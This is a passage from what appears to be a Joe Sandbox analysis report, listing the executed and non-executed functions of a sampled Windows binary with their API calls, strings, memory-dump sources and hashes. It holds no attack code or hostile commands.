                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: fbf6687cbf1bed917e70a137fad97430a048c1c075d61465321af869dfeb4683
                                                              • Instruction ID: 203d40651cdd8d03294ba94bf44da3c3e97bf45c8220cad321fa1a27a78a419c
                                                              • Opcode Fuzzy Hash: fbf6687cbf1bed917e70a137fad97430a048c1c075d61465321af869dfeb4683
                                                              • Instruction Fuzzy Hash: 55A011C23AA0203C300822A33C02C3B020CC0C2B2A3B2822FF80082080B88C088A083E
                                                              Function 0042E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: cb7da67b663c0b873019832a2876e5246808305bbf2b27c7d9a787221c2cded5
                                                              • Instruction ID: c3bd6a4be92b5f672a07bebbce8cfa028d5cfc5037bcac5796e9a6925bfce051
                                                              • Opcode Fuzzy Hash: cb7da67b663c0b873019832a2876e5246808305bbf2b27c7d9a787221c2cded5
                                                              • Instruction Fuzzy Hash: D1A012C136A0217C300421933C02C37010CC0C1B54372841FF40181080B84C0845043D
                                                              Function 0042E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E580
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: f6cf683930e2225f8efa27874aa385125c9de6b229e26876fbe5692560ac977d
                                                              • Instruction ID: c3bd6a4be92b5f672a07bebbce8cfa028d5cfc5037bcac5796e9a6925bfce051
                                                              • Opcode Fuzzy Hash: f6cf683930e2225f8efa27874aa385125c9de6b229e26876fbe5692560ac977d
                                                              • Instruction Fuzzy Hash: D1A012C136A0217C300421933C02C37010CC0C1B54372841FF40181080B84C0845043D
                                                              Function 00419F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEndOfFile.KERNELBASE(?,0041903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00419F0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File
                                                              • String ID:
                                                              • API String ID: 749574446-0
                                                              • Opcode ID: 1e7281510447f289e3ee52b5e67e64293a9b650472413fedcaf3926af7443a64
                                                              • Instruction ID: 26d34109368d939569f500bf89a66a9190a5703f2e21db6e3de3034b590f7924
                                                              • Opcode Fuzzy Hash: 1e7281510447f289e3ee52b5e67e64293a9b650472413fedcaf3926af7443a64
                                                              • Instruction Fuzzy Hash: 02A0113808000A8A8E002F30CA0800C3B20EB22BC230002A8A00ACA0A2CB22880B8A00
                                                              Function 0042AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,0042AE72,C:\Users\user\Desktop,00000000,0045946A,00000006), ref: 0042AC08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: d52353ff2f87e5a6ab667262e00abadde9b9584d6c73d2d9993b4a4194478b71
                                                              • Instruction ID: 08e9c110eb758c653a3a5c39afd47260cb9c6f83e0fa99780179892ee9dce05a
                                                              • Opcode Fuzzy Hash: d52353ff2f87e5a6ab667262e00abadde9b9584d6c73d2d9993b4a4194478b71
                                                              • Instruction Fuzzy Hash: 45A011302002808BA2000F328F0AA0EBAAAAFA2B02F00C038A08080030CB30C830AA08
                                                              Function 00419620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(000000FF,?,?,004195D6,?,?,?,?,?,00442641,000000FF), ref: 0041963B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: ccf39a55c55a62838a00c3663ef3a21cd3e90607948ad5d1377efb6a2aed819e
                                                              • Instruction ID: 02ca065ec4590d0748216d83b5d8091a68a569116cbb30fd6b78a43b545efb03
                                                              • Opcode Fuzzy Hash: ccf39a55c55a62838a00c3663ef3a21cd3e90607948ad5d1377efb6a2aed819e
                                                              • Instruction Fuzzy Hash: 5FF08970485B159FDB308A24C4687D377E86B12326F045B1FD4E643AE0D7696DCD8A54

                                                              Non-executed Functions

                                                              Function 0042C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0042C2B1
                                                              • EndDialog.USER32(?,00000006), ref: 0042C2C4
                                                              • GetDlgItem.USER32(?,0000006C), ref: 0042C2E0
                                                              • SetFocus.USER32(00000000), ref: 0042C2E7
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0042C321
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0042C358
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0042C36E
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042C38C
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042C39C
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0042C3B8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0042C3D4
                                                              • _swprintf.LIBCMT ref: 0042C404
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0042C417
                                                              • FindClose.KERNEL32(00000000), ref: 0042C41E
                                                              • _swprintf.LIBCMT ref: 0042C477
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0042C48A
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0042C4A7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0042C4C7
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042C4D7
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0042C4F1
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0042C509
                                                              • _swprintf.LIBCMT ref: 0042C535
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0042C548
                                                              • _swprintf.LIBCMT ref: 0042C59C
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0042C5AF
                                                                • Part of subcall function 0042AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0042AF35
                                                                • Part of subcall function 0042AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0044E72C,?,?), ref: 0042AF84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$PB$REPLACEFILEDLG
                                                              • API String ID: 797121971-2178673917
                                                              • Opcode ID: 5aa5370aa3e229e6bb78df8d78f92b2ce401f68be3245d5baa8bd37039be68ef
                                                              • Instruction ID: 6ab253dbce7845fd85ae7bf9e9721d753475412c0e536de9fcebc24e643d19ef
                                                              • Opcode Fuzzy Hash: 5aa5370aa3e229e6bb78df8d78f92b2ce401f68be3245d5baa8bd37039be68ef
                                                              • Instruction Fuzzy Hash: 2691D672644354BBD221DFA0DC89FFF77ACEB4A705F40482AF649D2081DB39A604877A
                                                              Function 00416FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00416FAA
                                                              • _wcslen.LIBCMT ref: 00417013
                                                              • _wcslen.LIBCMT ref: 00417084
                                                                • Part of subcall function 00417A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00417AAB
                                                                • Part of subcall function 00417A9C: GetLastError.KERNEL32 ref: 00417AF1
                                                                • Part of subcall function 00417A9C: CloseHandle.KERNEL32(?), ref: 00417B00
                                                                • Part of subcall function 0041A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0041977F,?,?,004195CF,?,?,?,?,?,00442641,000000FF), ref: 0041A1F1
                                                                • Part of subcall function 0041A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0041977F,?,?,004195CF,?,?,?,?,?,00442641), ref: 0041A21F
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00417139
                                                              • CloseHandle.KERNEL32(00000000), ref: 00417155
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00417298
                                                                • Part of subcall function 00419DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004173BC,?,?,?,00000000), ref: 00419DBC
                                                                • Part of subcall function 00419DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00419E70
                                                                • Part of subcall function 00419620: CloseHandle.KERNELBASE(000000FF,?,?,004195D6,?,?,?,?,?,00442641,000000FF), ref: 0041963B
                                                                • Part of subcall function 0041A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A501
                                                                • Part of subcall function 0041A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3983180755-3508440684
                                                              • Opcode ID: aa8c3a03e7f727312d4f7df5d9866e246922c147e9f37de13afadbc34125984c
                                                              • Instruction ID: dadb81b30dc14c74243ea353e2cffb2590083b1cd81c894d147b1034a0a752d6
                                                              • Opcode Fuzzy Hash: aa8c3a03e7f727312d4f7df5d9866e246922c147e9f37de13afadbc34125984c
                                                              • Instruction Fuzzy Hash: F9C1D771904208AADB25DB75DC41FEFB7B8AF08704F00455FF956E3282D738AA84CB69
                                                              Function 0043D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: 5064a3a6a3c20f0608ac40e67da68e84f710f7eb6c2b83b324d8942eb2570e71
                                                              • Instruction ID: b02ea35041def15b4c76971c53f2f1d5f6dec9fca79a8e185a1a6c160591abfe
                                                              • Opcode Fuzzy Hash: 5064a3a6a3c20f0608ac40e67da68e84f710f7eb6c2b83b324d8942eb2570e71
                                                              • Instruction Fuzzy Hash: A7C26A71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45
                                                              Function 004132F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog_swprintf
                                                              • String ID: CMT$h%u$hc%u
                                                              • API String ID: 146138363-3282847064
                                                              • Opcode ID: d5170ce4ed2e8aedf95d8904d38707a6941c34f744e7ec6a1943c43cdf67d173
                                                              • Instruction ID: 691239f45e7ef0c6a62c4fc45582a63b11e2cdd1bbe50415ab46bc9bf2e06723
                                                              • Opcode Fuzzy Hash: d5170ce4ed2e8aedf95d8904d38707a6941c34f744e7ec6a1943c43cdf67d173
                                                              • Instruction Fuzzy Hash: 8532D6715143849FDB14DF74C895AEA3BA5AF15304F04047FFD8A8B282DB78AA89CB54
                                                              Function 0041286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00412874
                                                              • _strlen.LIBCMT ref: 00412E3F
                                                                • Part of subcall function 004202BA: __EH_prolog.LIBCMT ref: 004202BF
                                                                • Part of subcall function 00421B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0041BAE9,00000000,?,?,?,0001041E), ref: 00421BA0
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00412F91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                              • String ID: CMT
                                                              • API String ID: 1206968400-2756464174
                                                              • Opcode ID: e3bae58d5c57742e92904a76f5331dd868b21cabaddd366a6966d5b69c20ff2d
                                                              • Instruction ID: 4151f5fa6b8ca1d2cd943b28ac6cf38b30aa7ed3daf03ff9d30b2ee0c29e6718
                                                              • Opcode Fuzzy Hash: e3bae58d5c57742e92904a76f5331dd868b21cabaddd366a6966d5b69c20ff2d
                                                              • Instruction Fuzzy Hash: 2C6208716002448FDB19DF34C9857EA3BA1AF54304F08457FEC9ACB382D7B9A995CB68
                                                              Function 0042F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042F844
                                                              • IsDebuggerPresent.KERNEL32 ref: 0042F910
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042F930
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0042F93A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 070dee31bb596d5077f59c2fe75f40ef8f8ccefddebe2cf96f03fb4cba0fb541
                                                              • Instruction ID: 4d0ca39a79fa093e518cf48f589dc3bddf380276afe8a6648db970d15ac1acec
                                                              • Opcode Fuzzy Hash: 070dee31bb596d5077f59c2fe75f40ef8f8ccefddebe2cf96f03fb4cba0fb541
                                                              • Instruction Fuzzy Hash: 1A312C75D0522D9BDF10DFA4D9897CDBBB8AF04704F5041EAE40CA7250EB759B888F48
                                                              Function 0042E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,0042E5E8,0000001C,0042E7DD,00000000,?,?,?,?,?,?,?,0042E5E8,00000004,00471CEC,0042E86D), ref: 0042E6B4
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0042E5E8,00000004,00471CEC,0042E86D), ref: 0042E6CF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: D
                                                              • API String ID: 401686933-2746444292
                                                              • Opcode ID: b120c3ae7e5695230b187692ca72a6050fc7fcaa9e8cca3424a9912f7bc19c26
                                                              • Instruction ID: 249871789677129aeb672b61de4b88ad00a5508495b02f8c1a39077ba1842e4c
                                                              • Opcode Fuzzy Hash: b120c3ae7e5695230b187692ca72a6050fc7fcaa9e8cca3424a9912f7bc19c26
                                                              • Instruction Fuzzy Hash: 5A012B327001196BDF14DF6ADC09BDE7BAAEFC4324F0CC121ED19D7250D638D9058684
                                                              Function 00438EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00438FB5
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00438FBF
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00438FCC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
